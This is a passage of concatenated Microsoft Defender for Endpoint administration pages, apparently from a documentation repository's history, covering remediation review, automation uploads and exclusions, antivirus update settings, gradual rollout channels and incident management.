-You can add comments and view historical events about an alert to see previous changes made to the alert.
-
-Whenever a change or comment is made to an alert, it is recorded in the **Comments and history** section.
-
-Added comments instantly appear on the pane.
-
-## Related articles
--- [Exclusions for Microsoft Defender for Endpoint and Microsoft Defender Antivirus](defender-endpoint-antivirus-exclusions.md)-- [Manage suppression rules](manage-suppression-rules.md)-- [View and organize the Microsoft Defender for Endpoint Alerts queue](alerts-queue.md)-- [Investigate Microsoft Defender for Endpoint alerts](investigate-alerts.md)-- [Investigate a file associated with a Microsoft Defender for Endpoint alert](investigate-files.md)-- [Investigate devices in the Microsoft Defender for Endpoint Devices list](investigate-machines.md)-- [Investigate an IP address associated with a Microsoft Defender for Endpoint alert](investigate-ip.md)-- [Investigate a domain associated with a Microsoft Defender for Endpoint alert](investigate-domain.md)-- [Investigate a user account in Microsoft Defender for Endpoint](investigate-user.md)--
security Manage Auto Investigation https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/manage-auto-investigation.md
- Title: Review remediation actions following automated investigations
-description: Review and approve (or reject) remediation actions following an automated investigation.
--- Previously updated : 07/13/2023---- m365-security-- tier2-- mde-edr-----
-# Review remediation actions following an automated investigation
-
-**Applies to:**
-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Business](../defender-business/mdb-overview.md)-
-## Remediation actions
-
-When an [automated investigation](automated-investigations.md) runs, a verdict is generated for each piece of evidence investigated. Verdicts can be *Malicious*, *Suspicious*, or *No threats found*.
-
-Depending on
--- the type of threat,-- the resulting verdict, and-- how your organization's [device groups](/microsoft-365/security/defender-endpoint/machine-groups) are configured,-
-remediation actions can occur automatically or only upon approval by your organization's security operations team.
-
-> [!NOTE]
-> Device group creation is supported in Defender for Endpoint Plan 1 and Plan 2.
-
-Here are a few examples:
--- **Example 1**: Fabrikam's device groups are set to **Full - remediate threats automatically** (the recommended setting). In this case, remediation actions are taken automatically for artifacts that are considered to be malicious following an automated investigation (see [Review completed actions](#review-completed-actions)).--- **Example 2**: Contoso's devices are included in a device group that is set for **Semi - require approval for any remediation**. In this case, Contoso's security operations team must review and approve all remediation actions following an automated investigation (see [Review pending actions](#review-pending-actions)).--- **Example 3**: Tailspin Toys has their device groups set to **No automated response** (not recommended). In this case, automated investigations do not occur. No remediation actions are taken or pending, and no actions are logged in the [Action center](/microsoft-365/security/defender-endpoint/auto-investigation-action-center#the-action-center) for their devices (see [Manage device groups](/microsoft-365/security/defender-endpoint/machine-groups#manage-device-groups)).-
-Whether taken automatically or upon approval, an automated investigation and remediation can result in one or more of the remediation actions:
--- Quarantine a file-- Remove a registry key-- Kill a process-- Stop a service-- Disable a driver-- Remove a scheduled task-
-## Review pending actions
-
-1. Go to the <a href="https://go.microsoft.com/fwlink/p/?linkid=2077139" target="_blank">Microsoft Defender portal</a> and sign in.
-
-2. In the navigation pane, choose **Action center**.
-
-3. Review the items on the **Pending** tab.
-
-4. Select an action to open its flyout pane.
-
-5. In the flyout pane, review the information, and then take one of the following steps:
-
- - Select **Open investigation page** to view more details about the investigation.
- - Select **Approve** to initiate a pending action.
- - Select **Reject** to prevent a pending action from being taken.
- - Select **Go hunt** to go into [Advanced hunting](advanced-hunting-overview.md).
-
-### Approve or reject remediation actions
-
-For incidents with a remediation status of **Pending approval**, you can also approve or reject a remediation action from within the incident.
-
-1. In the navigation pane, go to **Incidents & alerts** \> **Incidents**.
-2. Filter on **Pending action** for the Automated investigation state (optional).
-3. Select an incident name to open its summary page.
-4. Select the **Evidence and Response** tab.
-5. Select an item in the list to open its flyout pane.
-6. Review the information, and then take one of the following steps:
- - Select the Approve pending action option to initiate a pending action.
- - Select the Reject pending action option to prevent a pending action from being taken.
--
-## Review completed actions
-
-1. Go to the <a href="https://go.microsoft.com/fwlink/p/?linkid=2077139" target="_blank">Microsoft Defender portal</a> and sign in.
-
-2. In the navigation pane, choose **Action center**.
-
-3. Review the items on the **History** tab.
-
-4. Select an item to view more details about that remediation action.
-
-## Undo completed actions
-
-If you've determined that a device or a file is not a threat, you can undo remediation actions that were taken, whether those actions were taken automatically or manually. In the Action center, on the **History** tab, you can undo any of the following actions:
-
-|Action source|Supported Actions|
-|||
-|<ul><li>Automated investigation</li><li>Manual response actions (see the note below)</li><li>Microsoft Defender Antivirus</li></ul>|<ul><li>Disable a driver</li><li>Isolate device</li><li>Quarantine a file</li><li>Remove a registry key</li><li>Remove a scheduled task</li><li>Restrict code execution</li><li>Stop a service</li></ul>|
-
-> [!NOTE]
-> [Defender for Endpoint Plan 1](defender-endpoint-plan-1.md) and [Microsoft Defender for Business](../defender-business/mdb-overview.md) include only the following manual response actions:
->
-> - Run antivirus scan
-> - Isolate device
-> - Stop and quarantine a file
-> - Add an indicator to block or allow a file
-
-### To undo multiple actions at one time
-
-1. Go to the Action center ([https://security.microsoft.com/action-center](https://security.microsoft.com/action-center)) and sign in.
-
-2. On the **History** tab, select the actions that you want to undo. Make sure to select items that have the same Action type. A flyout pane opens.
-
-3. In the flyout pane, select **Undo**.
-
-### To remove a file from quarantine across multiple devices
-
-1. Go to the Action center ([https://security.microsoft.com/action-center](https://security.microsoft.com/action-center)) and sign in.
-
-2. On the **History** tab, select an item that has the Action type **Quarantine file**.
-
-3. In the flyout pane, select **Apply to X more instances of this file**, and then select **Undo**.
-
-## Automation levels, automated investigation results, and resulting actions
-
-Automation levels affect whether certain remediation actions are taken automatically or only upon approval. Sometimes your security operations team has more steps to take, depending on the results of an automated investigation. The following table summarizes automation levels, results of automated investigations, and what to do in each case.
-
-|Device group setting|Automated investigation results|What to do|
-||||
-|**Full - remediate threats automatically**<br/>(recommended)|A verdict of *Malicious* is reached for a piece of evidence. <p> Appropriate remediation actions are taken automatically.|[Review completed actions](#review-completed-actions) |
-|**Semi - require approval for any remediation**|A verdict of either *Malicious* or *Suspicious* is reached for a piece of evidence. <p> Remediation actions are pending approval to proceed.|[Approve (or reject) pending actions](#review-pending-actions)|
-|**Semi - require approval for core folders remediation**|A verdict of *Malicious* is reached for a piece of evidence. <p> If the artifact is a file or executable and is in an operating system directory, such as the Windows folder or the Program files folder, then remediation actions are pending approval. <p> If the artifact is *not* in an operating system directory, remediation actions are taken automatically.|<ol><li>[Approve (or reject) pending actions](#review-pending-actions)</li><li>[Review completed actions](#review-completed-actions)</li></ol>|
-|**Semi - require approval for core folders remediation**|A verdict of *Suspicious* is reached for a piece of evidence. <p> Remediation actions are pending approval.|[Approve (or reject) pending actions](#review-pending-actions).|
-|**Semi - require approval for non-temp folders remediation**|A verdict of *Malicious* is reached for a piece of evidence. <p> If the artifact is a file or executable that is not in a temporary folder, such as the user's downloads folder or temp folder, remediation actions are pending approval. <p> If the artifact is a file or executable that *is* in a temporary folder, remediation actions are taken automatically.|<ol><li>[Approve (or reject) pending actions](#review-pending-actions)</li><li>[Review completed actions](#review-completed-actions)</li></ol>|
-|**Semi - require approval for non-temp folders remediation**|A verdict of *Suspicious* is reached for a piece of evidence. <p> Remediation actions are pending approval.|[Approve (or reject) pending actions](#review-pending-actions)|
-|Any of the **Full** or **Semi** automation levels|A verdict of *No threats found* is reached for a piece of evidence. <p> No remediation actions are taken, and no actions are pending approval.|[View details and results of automated investigations](/microsoft-365/security/defender-endpoint/auto-investigation-action-center)|
-|**No automated response** (not recommended)|No automated investigations run, so no verdicts are reached, and no remediation actions are taken or awaiting approval.|[Consider setting up or changing your device groups to use **Full** or **Semi** automation](/microsoft-365/security/defender-endpoint/machine-groups)|
-
-All verdicts are tracked in the [Action center](auto-investigation-action-center.md#the-unified-action-center).
-
-> [!NOTE]
-> In [Defender for Business](../defender-business/mdb-overview.md), automated investigation and remediation capabilities are preset to use **Full - remediate threats automatically**. These capabilities are applied to all devices by default.
-
-## Next steps
--- [Learn about live response capabilities](live-response.md)-- [Proactively hunt for threats with advanced hunting](advanced-hunting-overview.md)-- [Address false positives/negatives in Microsoft Defender for Endpoint](defender-endpoint-false-positives-negatives.md)-
-## See also
--- [Overview of automated investigations](automated-investigations.md)
security Manage Automation File Uploads https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/manage-automation-file-uploads.md
- Title: Manage automation file uploads
-description: Enable content analysis and configure the file extension and email attachment extensions that will be submitted for analysis
------- m365-security-- tier2- Previously updated : 05/08/2023--
-# Manage automation file uploads
--
-**Applies to:**
-- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-
-> Want to experience Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-automationefileuploads-abovefoldlink)
-
-Enable the content analysis capability so that certain files and email attachments can automatically be uploaded to the cloud for additional inspection in Automated investigation.
-
-Microsoft uses various file investigation mechanisms to inspect and analyze files.
-
-Identify the files and email attachments by specifying the file extension names and email attachment extension names.
-
-For example, if you add *exe* and *bat* as file or attachment extension names, then all files or attachments with those extensions will automatically be sent to the cloud for additional inspection during Automated investigation.
-
-> [!NOTE]
-> Microsoft securely stores the files submitted for a six-month period. Files are promptly deleted after six months.
-
-## Add file extension names and attachment extension names.
-
-1. Log in to [Microsoft Defender XDR](https://go.microsoft.com/fwlink/p/?linkid=2077139) using an account with the Security administrator or Global administrator role assigned.
-
-2. In the navigation pane, select **Settings** \> **Endpoints** \> **Rules** \> **Automation uploads**.
-
-2. Toggle the content analysis setting between **On** and **Off**.
-
-3. Configure the following extension names and separate extension names with a comma:
- - **File extension names** - Suspicious files except email attachments will be submitted for additional inspection
-
-## Related topics
--- [Manage automation folder exclusions](manage-automation-folder-exclusions.md)
security Manage Automation Folder Exclusions https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/manage-automation-folder-exclusions.md
- Title: Manage automation folder exclusions
-description: Add automation folder exclusions to control the files that are excluded from an automated investigation.
------- m365-security-- tier2-- mde-edr-- Previously updated : 12/18/2020--
-# Manage automation folder exclusions
---
-**Applies to:**
-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-
-> Want to experience Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-automationexclusionfolder-abovefoldlink)
-
-Automation folder exclusions allow you to specify folders that the Automated investigation will skip.
-
-You can control the following attributes about the folder that you'd like to be skipped:
--- **Folders**: You can specify a folder and its subfolders to be skipped.-
- > [!NOTE]
- > At this time, use of wild cards as a way to exclude files under a directory is not yet supported.
--- **Extensions of the files**: You can specify the extensions to exclude in a specific directory. The extensions are a way to prevent an attacker from using an excluded folder to hide an exploit. The extensions explicitly define which files to ignore.--- **File names**: You can specify the file names that you want to be excluded in a specific directory. The names are a way to prevent an attacker from using an excluded folder to hide an exploit. The names explicitly define which files to ignore.-
-## Add an automation folder exclusion
-
-1. Log in to [Microsoft Defender XDR](https://go.microsoft.com/fwlink/p/?linkid=2077139) using an account with the Security administrator or Global administrator role assigned.
-
-2. In the navigation pane, select **Settings** \> **Endpoints** \> **Rules** \> **Automation folder exclusions**.
-
-2. Click **New folder exclusion**.
-
-3. Enter the folder details:
-
- - Folder
- - Extensions
- - File names
- - Description
-
-4. Click **Save**.
-
-> [!NOTE]
-> Live Response commands to collect or examine excluded files will fail with error: "File is excluded". In addition, automated investigations will ignore the excluded items.
-
-## Edit an automation folder exclusion
-
-1. In the navigation pane, select **Settings** \> **Endpoints** \> **Rules** \> **Automation folder exclusions**.
-2. Click **Edit** on the folder exclusion.
-3. Update the details of the rule and click **Save**.
-
-## Remove an automation folder exclusion
-
-1. In the navigation pane, select **Settings** \> **Endpoints** \> **Rules** \> **Automation folder exclusions**.
-2. Click **Remove exclusion**.
-
-## Related articles
--- [Manage automation allowed/blocked lists](manage-indicators.md)-- [Manage automation file uploads](manage-automation-file-uploads.md)-- [Exclusions for Microsoft Defender for Endpoint and Microsoft Defender Antivirus](defender-endpoint-antivirus-exclusions.md)
security Manage Event Based Updates Microsoft Defender Antivirus https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/manage-event-based-updates-microsoft-defender-antivirus.md
- Title: Apply Microsoft Defender Antivirus updates after certain events
-description: Manage how Microsoft Defender Antivirus applies security intelligence updates after startup or receiving cloud-delivered detection reports.
----- Previously updated : 02/27/2024------ m365-security-- tier2-- mde-ngp--
-# Manage event-based forced updates
---
-**Applies to:**
-- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- Microsoft Defender for Business--- Microsoft Defender Antivirus-
-**Platforms**
-- Windows-
-Microsoft Defender Antivirus allows you to determine if updates should (or shouldn't) occur after certain events, such as at startup or after receiving specific reports from the cloud-delivered protection service.
-
-## Check for protection updates before running a scan
-
-You can use Microsoft Defender for Endpoint Security Settings Management, Microsoft Intune, Microsoft Configuration Manager, Group Policy, PowerShell cmdlets, and WMI to force Microsoft Defender Antivirus to check and download protection updates before running a scheduled scan.
-
-### Use Microsoft Defender for Endpoint Security Settings Management to check for protection updates before running a scan
-
-1. On your Microsoft Defender for Endpoint console ([https://security.microsoft.com](https://security.microsoft.com)), go to **Endpoints** > **Configuration management** > **Endpoint security policies** > **Create new policy**.
-
- - In the **Platform** list, select **Windows 10, Windows 11, and Windows Server**.
- - In the **Select Templates** list, select **Microsoft Defender Antivirus**.
-
-2. Fill in the name and description, and then select **Next**>
-
-3. Go to the **Scheduled scans** section and set **Check For Signatures Before Running Scan** to **Enabled**.
-
-4. Deploy the updated policy as usual.
-
-### Use Microsoft Intune to check for protection updates before running a scan
-
-1. In the [Microsoft Intune admin center](https://intune.microsoft.com/), go to **Endpoints** > **Configuration management** > **Endpoint security policies**, and then select **Create new policy**.
-
- - In the **Platform** list, select **Windows 10, Windows 11, and Windows Server**.
- - In the **Select Templates** list, select **Microsoft Defender Antivirus**.
-
-2. Fill in the name and description, and then select **Next**.
-
-3. Go to the **Scheduled scans** section, and set **Check For Signatures Before Running Scan** to **Enabled**.
-
-4. Save and deploy the policy.
-
-### Use Configuration Manager to check for protection updates before running a scan
-
-1. On your Microsoft Configuration Manager console, open the antimalware policy you want to change (select **Assets and Compliance** in the navigation pane, then expand the tree to **Overview** \> **Endpoint Protection** \> **Antimalware Policies**).
-
-2. Go to the **Scheduled scans** section and set **Check for the latest security intelligence updates before running a scan** to **Yes**.
-
-3. Select **OK**.
-
-4. [Deploy the updated policy as usual](/sccm/protect/deploy-use/endpoint-antimalware-policies#deploy-an-antimalware-policy-to-client-computers).
-
-### Use Group Policy to check for protection updates before running a scan
-
-1. On your Group Policy management machine, open the [Group Policy Management Console](/previous-versions/windows/desktop/gpmc/group-policy-management-console-portal).
-
-2. Right-click the Group Policy Object you want to configure, and then select **Edit**.
-
-3. Using the **Group Policy Management Editor** go to **Computer configuration**.
-
-4. Select **Policies** then **Administrative templates**.
-
-5. Expand the tree to **Windows components** \> **Microsoft Defender Antivirus** \> **Scan**.
-
-6. Double-click **Check for the latest virus and spyware definitions before running a scheduled scan** and set the option to **Enabled**.
-
-7. Select **OK**.
-
-### Use PowerShell cmdlets to check for protection updates before running a scan
-
-Use the following cmdlets:
-
-```PowerShell
-Set-MpPreference -CheckForSignaturesBeforeRunningScan
-```
-
-For more information, see [Use PowerShell cmdlets to configure and run Microsoft Defender Antivirus](use-powershell-cmdlets-microsoft-defender-antivirus.md) and [Defender Antivirus cmdlets](/powershell/module/defender/index).
-
-### Use Windows Management Instruction (WMI) to check for protection updates before running a scan
-
-Use the [**Set** method of the **MSFT_MpPreference**](/previous-versions/windows/desktop/legacy/dn455323(v=vs.85)) class for the following properties:
-
-```WMI
-CheckForSignaturesBeforeRunningScan
-```
-
-For more information, see [Windows Defender WMIv2 APIs](/previous-versions/windows/desktop/defender/windows-defender-wmiv2-apis-portal).
-
-## Check for protection updates on startup
-
-You can use Group Policy to force Microsoft Defender Antivirus to check and download protection updates when the machine is started.
-
-1. On your Group Policy management computer, open the [Group Policy Management Console](/previous-versions/windows/desktop/gpmc/group-policy-management-console-portal), right-click the Group Policy Object you want to configure and select **Edit**.
-
-2. Using the **Group Policy Management Editor** go to **Computer configuration**.
-
-3. Select **Policies** then **Administrative templates**.
-
-4. Expand the tree to **Windows components** \> **Microsoft Defender Antivirus** \> **Security Intelligence Updates**.
-
-5. Double-click **Check for the latest virus and spyware definitions on startup** and set the option to **Enabled**.
-
-6. Select **OK**.
-
-You can also use Group Policy, PowerShell, or WMI to configure Microsoft Defender Antivirus to check for updates at startup even when it isn't running.
-
-### Use Group Policy to download updates when Microsoft Defender Antivirus is not present
-
-1. On your Group Policy management machine, open the [Group Policy Management Console](/previous-versions/windows/desktop/gpmc/group-policy-management-console-portal), right-click the Group Policy Object you want to configure and select **Edit**.
-
-2. Using the **Group Policy Management Editor**, go to **Computer configuration**.
-
-3. Select **Policies** then **Administrative templates**.
-
-4. Expand the tree to **Windows components** \> **Microsoft Defender Antivirus** \> **Security Intelligence Updates**.
-
-5. Double-click **Initiate security intelligence update on startup** and set the option to **Enabled**.
-
-6. Select **OK**.
-
-### Use PowerShell cmdlets to download updates when Microsoft Defender Antivirus is not present
-
-Use the following cmdlets:
-
-```PowerShell
-Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine
-```
-
-For more information, see [Use PowerShell cmdlets to manage Microsoft Defender Antivirus](use-powershell-cmdlets-microsoft-defender-antivirus.md) and [Defender Antivirus cmdlets](/powershell/module/defender/index) for more information on how to use PowerShell with Microsoft Defender Antivirus.
-
-### Use Windows Management Instruction (WMI) to download updates when Microsoft Defender Antivirus is not present
-
-Use the [**Set** method of the **MSFT_MpPreference**](/previous-versions/windows/desktop/legacy/dn455323(v=vs.85)) class for the following properties:
-
-```WMI
-SignatureDisableUpdateOnStartupWithoutEngine
-```
-
-For more information, see [Windows Defender WMIv2 APIs](/previous-versions/windows/desktop/defender/windows-defender-wmiv2-apis-portal).
-
-<a id="cloud-report-updates"></a>
-
-## Allow ad hoc changes to protection based on cloud-delivered protection
-
-Microsoft Defender Antivirus can make changes to its protection based on cloud-delivered protection. Such changes can occur outside of normal or scheduled protection updates.
-
-If you have enabled cloud-delivered protection, Microsoft Defender Antivirus sends files it's suspicious about to the Windows Defender cloud. If the cloud service reports that the file is malicious, and the file is detected in a recent protection update, you can use Group Policy to configure Microsoft Defender Antivirus to automatically receive that protection update. Other important protection updates can also be applied.
-
-### Use Group Policy to automatically download recent updates based on cloud-delivered protection
-
-1. On your Group Policy management machine, open the [Group Policy Management Console](/previous-versions/windows/desktop/gpmc/group-policy-management-console-portal), right-click the Group Policy Object you want to configure and select **Edit**.
-
-2. Using the **Group Policy Management Editor** go to **Computer configuration**.
-
-3. Select **Policies** then **Administrative templates**.
-
-4. Expand the tree to **Windows components** \> **Microsoft Defender Antivirus** \> **Security Intelligence Updates**.
-
-5. Double-click **Allow real-time security intelligence updates based on reports to Microsoft MAPS** and set the option to **Enabled**. Then select **OK**.
-
-6. **Allow notifications to disable definitions-based reports to Microsoft MAPS** and set the option to **Enabled**. Then select **OK**.
-
-> [!NOTE]
-> **Allow notifications to disable definitions based reports** enables Microsoft MAPS to disable those definitions known to cause false-positive reports. You must configure your computer to join Microsoft MAPS for this function to work.
-
-> [!TIP]
-> If you're looking for Antivirus related information for other platforms, see:
-> - [Set preferences for Microsoft Defender for Endpoint on macOS](mac-preferences.md)
-> - [Microsoft Defender for Endpoint on Mac](microsoft-defender-endpoint-mac.md)
-> - [macOS Antivirus policy settings for Microsoft Defender Antivirus for Intune](/mem/intune/protect/antivirus-microsoft-defender-settings-macos)
-> - [Set preferences for Microsoft Defender for Endpoint on Linux](linux-preferences.md)
-> - [Microsoft Defender for Endpoint on Linux](microsoft-defender-endpoint-linux.md)
-> - [Configure Defender for Endpoint on Android features](android-configure.md)
-> - [Configure Microsoft Defender for Endpoint on iOS features](ios-configure-features.md)
-
-## See also
--- [Deploy Microsoft Defender Antivirus](deploy-manage-report-microsoft-defender-antivirus.md)-- [Manage Microsoft Defender Antivirus updates and apply baselines](microsoft-defender-antivirus-updates.md)-- [Manage when protection updates should be downloaded and applied](manage-protection-update-schedule-microsoft-defender-antivirus.md)-- [Manage updates for endpoints that are out of date](manage-outdated-endpoints-microsoft-defender-antivirus.md)-- [Manage updates for mobile devices and virtual machines (VMs)](manage-updates-mobile-devices-vms-microsoft-defender-antivirus.md)-- [Microsoft Defender Antivirus in Windows 10](microsoft-defender-antivirus-in-windows-10.md)-
security Manage Gradual Rollout https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/manage-gradual-rollout.md
- Title: Manage the gradual rollout process for Microsoft Defender updates
-description: Learn about the gradual update process and controls.
--- NOCSH------ m365-security-- tier2-- Previously updated : 01/12/2024--
-# Manage the gradual rollout process for Microsoft Defender updates
---
-**Applies to:**
--- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- Microsoft Defender Antivirus-
-**Platforms**
--- Windows-
-It's important to ensure that client components are up to date to deliver critical protection capabilities and prevent attacks.
-
-Capabilities are provided through several components:
--- [Endpoint Detection & Response](overview-endpoint-detection-response.md)-- [Next-generation protection](microsoft-defender-antivirus-windows.md) with [cloud-delivered protection](cloud-protection-microsoft-defender-antivirus.md)-- [Attack Surface Reduction](overview-attack-surface-reduction.md)-
-Updates are released monthly using a gradual release process. This process helps to enable early failure detection to identify issues as they occur and address them quickly before a larger rollout.
-
-> [!NOTE]
-> For more information on how to control daily security intelligence updates, see [Schedule Microsoft Defender Antivirus protection updates](manage-protection-update-schedule-microsoft-defender-antivirus.md). Updates ensure that next-generation protection can defend against new threats, even if cloud-delivered protection is not available to the endpoint.
-
-## Microsoft gradual rollout model
-
-The following gradual rollout model is followed for monthly Defender updates:
-
-1. The first release goes out to Beta channel subscribers.
-
-2. After validation, feedback, and fixes, we start the gradual rollout process in a throttled way and to Preview channel subscribers first.
-
-3. We then proceed to release the update to the rest of the global population, scaling out from 10-100%.
-
-Our engineers continuously monitor impact and escalate any issues to create a fix as needed.
-
-## How to customize your internal deployment process
--
-If your machines are receiving Defender updates from Windows Update, the gradual rollout process can result in some of your devices receiving Defender updates sooner than others. The following section explains how to define a strategy that will allow automatic updates to flow differently to specific groups of devices by using update channel configuration.
--
-> [!NOTE]
-> When planning for your own gradual release, please make sure to always have a selection of devices subscribed to the preview and staged channels. This will provide your organization as well as Microsoft the opportunity to prevent or find and fix issues specific to your environment.
-
-For machines receiving updates through, for example, Windows Server Update Services (WSUS) or Microsoft Configuration Manager, more options are available to all Windows updates, including options for Microsoft Defender for Endpoint.
--- Learn more about how to use solutions such as WSUS and MECM to manage the distribution and application of updates at [Manage Microsoft Defender Antivirus updates and apply baselines - Windows security](microsoft-defender-antivirus-updates.md#product-updates).-
-## Update channels for monthly updates
-
-You can assign a machine to an update channel to define the cadence in which a machine receives monthly engine and platform updates.
-
-For more information on how to configure updates, see [Create a custom gradual rollout process for Microsoft Defender updates](configure-updates.md).
-
-The following update channels are available:
-
-|Channel name|Description|Application|
-||||
-|Beta Channel - Prerelease|Test updates before others|Devices set to this channel are the first to receive new monthly updates. Select Beta Channel to participate in identifying and reporting issues to Microsoft. Devices in the Windows Insider Program are subscribed to this channel by default. For use in test environments only.|
-|Current Channel (Preview)|Get Current Channel updates **earlier** during gradual release|Devices set to this channel are offered updates earliest during the gradual release cycle. Suggested for pre-production/validation environments.|
-|Current Channel (Staged)|Get Current Channel updates later during gradual release|Devices are offered updates later during the gradual release cycle. Suggested to apply to a small, representative part of your device population (~10%).|
-|Current Channel (Broad)|Get updates at the end of gradual release|Devices will be offered updates only after the gradual release cycle completes. Suggested to apply to a broad set of devices in your production population (~10-100%).|
-|Critical: Time Delay|Delay Defender updates|Devices are offered updates with a 48-hour delay. Best for datacenter machines that only receive limited updates. Suggested for critical environments only.|
-|(default)||If you disable or don't configure this policy, the device remains in Current Channel (Default): Stay up to date automatically during the gradual release cycle. This means Microsoft assigns a channel to the device. The channel selected by Microsoft might be one that receives updates early during the gradual release cycle, which isn't suitable for devices in a production or critical environment.|
-
-### Update channels for security intelligence updates
-
-You can also assign a machine to a channel to define the cadence in which it receives SIUs (formerly referred to as signature, definition, or daily updates). Unlike the monthly process, there's no Beta channel and this gradual release cycle occurs multiple times a day.
-
-|Channel name|Description|Application|
-||||
-|Current Channel (Staged)|Get Current Channel updates later during gradual release|Devices are offered updates later during the gradual release cycle. Suggested to apply to a small, representative part of your device population (~10%).|
-|Current Channel (Broad)|Get updates at the end of gradual release|Devices will be offered updates after the gradual release cycle. Best for datacenter machines that only receive limited updates. Note: this setting applies to all Defender updates.|
-|(default)||If you disable or don't configure this policy, the device remains in Current Channel (Default): Stay up to date automatically during the gradual release cycle. This means Microsoft assigns a channel to the device. The channel selected by Microsoft might be one that receives updates early during the gradual release cycle, which isn't suitable for devices in a production or critical environment.|
-
-> [!NOTE]
-> In case you wish to force an update to the newest signature instead of leveraging the time delay, you will need to remove this policy first.
-
-## Update guidance
-
-In most cases, the recommended configuration when using Windows Update is to allow endpoints to receive and apply monthly Defender updates as they arrive. This option provides the best balance between protection and possible impact associated with the changes they can introduce.
-
-For environments where there's a need for a more controlled gradual rollout of automatic Defender updates, consider an approach with deployment groups:
-
-1. Participate in the Windows Insider program or assign a group of devices to the Beta Channel.
-
-2. Designate a pilot group that opts-in to Preview Channel, typically validation environments, to receive new updates early.
-
-3. Designate a group of machines that receive updates later during the gradual rollout from Staged channel. Typically, this group would be a representative ~10% of the population.
-
-4. Designate a group of machines that receive updates after the gradual release cycle completes. These are typically important production systems.
-
-For the remainder of devices, the default setting is to receive new updates as they arrive during the Microsoft gradual rollout process and no further configuration is required.
-
-Adopting this model:
--- Allows you to test early releases before they reach a production environment-- Ensure the production environment still receives regular updates and ensure protection against critical threats.-
-## Management tools
-
-To create your own custom gradual rollout process for monthly updates, you can use the following tools:
--- Group policy-- Microsoft Intune-- PowerShell-
-For details on how to use these tools, see [Create a custom gradual rollout process for Microsoft Defender updates](configure-updates.md).
-
-> [!TIP]
-> If you're looking for Antivirus related information for other platforms, see:
-> - [Set preferences for Microsoft Defender for Endpoint on macOS](mac-preferences.md)
-> - [Microsoft Defender for Endpoint on Mac](microsoft-defender-endpoint-mac.md)
-> - [macOS Antivirus policy settings for Microsoft Defender Antivirus for Intune](/mem/intune/protect/antivirus-microsoft-defender-settings-macos)
-> - [Set preferences for Microsoft Defender for Endpoint on Linux](linux-preferences.md)
-> - [Microsoft Defender for Endpoint on Linux](microsoft-defender-endpoint-linux.md)
-> - [Configure Defender for Endpoint on Android features](android-configure.md)
-> - [Configure Microsoft Defender for Endpoint on iOS features](ios-configure-features.md)
-
security Manage Incidents https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/manage-incidents.md
- Title: Manage Microsoft Defender for Endpoint incidents
-description: Manage incidents by assigning it, updating its status, or setting its classification.
------- m365-security-- tier2-- mde-edr-- Previously updated : 01/24/2024--
-# Manage Microsoft Defender for Endpoint incidents
---
-**Applies to:**
-- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-
-> Want to experience Microsoft Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-exposedapis-abovefoldlink)
-
-Managing incidents is an important part of every cybersecurity operation. You can manage incidents by selecting an incident from the **Incidents queue** or the **Incidents management pane**.
-
-> [!TIP]
-> For a limited time during January 2024, when you visit the **Incidents** page, Defender Boxed appears. Defender Boxed highlights your organization's security successes, improvements, and response actions during 2023. To reopen Defender Boxed, in the Microsoft Defender portal, go to **Incidents**, and then select **Your Defender Boxed**.
-
-Selecting an incident from the **Incidents queue** brings up the **Incident management pane** where you can open the incident page for details.
--
-You can assign incidents to yourself, change the status and classification, rename, or comment on them to keep track of their progress.
-
-> [!TIP]
-> For additional visibility at a glance, incident names are automatically generated based on alert attributes such as the number of endpoints affected, users affected, detection sources or categories. This allows you to quickly understand the scope of the incident.
->
-> For example: *Multi-stage incident on multiple endpoints reported by multiple sources.*
->
-> Incidents that existed prior the rollout of automatic incident naming will retain their names.
->
--
-## Assign incidents
-If an incident has not been assigned yet, you can select **Assign to me** to assign the incident to yourself. Doing so assumes ownership of not just the incident, but also all the alerts associated with it.
-
-## Set status and classification
-### Incident status
-You can categorize incidents (as **Active**, or **Resolved**) by changing their status as your investigation progresses. This helps you organize and manage how your team can respond to incidents.
-
-For example, your SOC analyst can review the urgent **Active** incidents for the day, and decide to assign them to himself for investigation.
-
-Alternatively, your SOC analyst might set the incident as **Resolved** if the incident has been remediated.
-
-### Classification
